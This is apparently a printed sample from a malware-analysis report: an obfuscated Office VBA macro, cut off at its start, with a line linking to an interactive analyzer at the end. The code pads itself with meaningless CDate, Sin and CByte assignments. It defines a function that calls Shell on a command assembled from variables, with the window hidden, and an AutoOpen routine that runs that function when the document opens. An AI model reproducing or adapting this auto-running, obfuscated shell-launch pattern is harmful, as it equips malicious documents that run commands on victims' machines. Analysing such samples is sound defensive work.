On Error Resume Next
aozaRL = CByte(UzWNEF)
JYkrtU = QhjvE
DIVFW = 78265
HjBMm = 41601
LboJdz = CDate(51756)
zbkMv = CDate(jfCDt + Sin(67930 + 6246) * 30464 * CInt(30941))
KPQRrbKkSZ = PiJpfkl + Chr(QEnwvl + 80 + KIHjbNfLY)
JKWbw = CByte(MzFPj)
FztBD = FWLJN
aAOFz = 39451
pFPhl = 34203
fLTiO = CDate(36489)
RwuYdj = CDate(rlEICG + Sin(53711 + 1429) * 12239 * CInt(12282))
wNdiiE = CByte(SJTmQ)
iIIHru = jZYUm
CpLRo = 48194
mtuUT = 52386
qSHVSi = CDate(30320)
IoAbjr = CDate(SLiZZ + Sin(16385 + 14046) * 86004 * CInt(85881))
mcGnivqsYDi = LBYzIinS + KPQRrbKkSZ + zJRWMQvS + DQYKkfLBn + mdPiDBrp + zShwGT + aEUlvTV + CrlzYbbdkT
rmjZO = CByte(nVHVQt)
fPTEw = fwOrv
UKOdcv = 32007
GwNtAz = 80071
sGSAjm = CDate(52333)
OqSTPV = CDate(uPHuFG + Sin(84667 + 74929) * 78584 * CInt(89352))
End Function
Function AmhmfzhNjrb(oDmPls)
On Error Resume Next
oZATd = CByte(IGLQK)
RnLDC = SBVRj
UbWbm = 95645
zXHas = 27567
uoSHnz = CDate(41966)
jqdPrY = CDate(YIHsLh + Sin(4545 + 83205) * 44890 * CInt(25324))
wMswv = CByte(Piibfo)
lVEso = GJion
usERF = 17709
lcFRjw = 8915
wpCWr = CDate(87021)
RpGQtb = CDate(vMWbFz + Sin(80034 + 38738) * 79201 * CInt(56623))
iNMHVAf = kucWckuzwUw + Shell(WzlkXq + oDmPls + DwQTwVKQ, 15260 - 15260)
zaqbc = CByte(YBGYi)
TDMmis = jijIzS
WjMNj = 29669
cDTSU = 42918
AGKjw = CDate(74207)
IcjAj = CDate(KjBRSC + Sin(68839 + 43023) * 54874 * CInt(2163))
End Function
Sub AutoOpen()
On Error Resume Next
WzCYFi = CByte(taVij)
unCcGr = ARGLnO
olsAbt = 60502
JrRQX = 68823
TzDCjj = CDate(97244)
VXIslF = CDate(MuVGI + Sin(95158 + 20355) * 68046 * CInt(56827))
Application.Run BZVbjsT + "AmhmfzhNjrb" + mPPiUDlwoE, lbckiaczUbj + mcGnivqsYDi + RTazZ
AJOaSp = CByte(vSPjas)
vstpZ = vTmzYJ
zKGCv = 98218
YHhfz = 46592
zzYfo = CDate(34642)
EKHjE = CDate(PvvasK + Sin(48994 + 32202) * 93806 * CInt(95006))
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.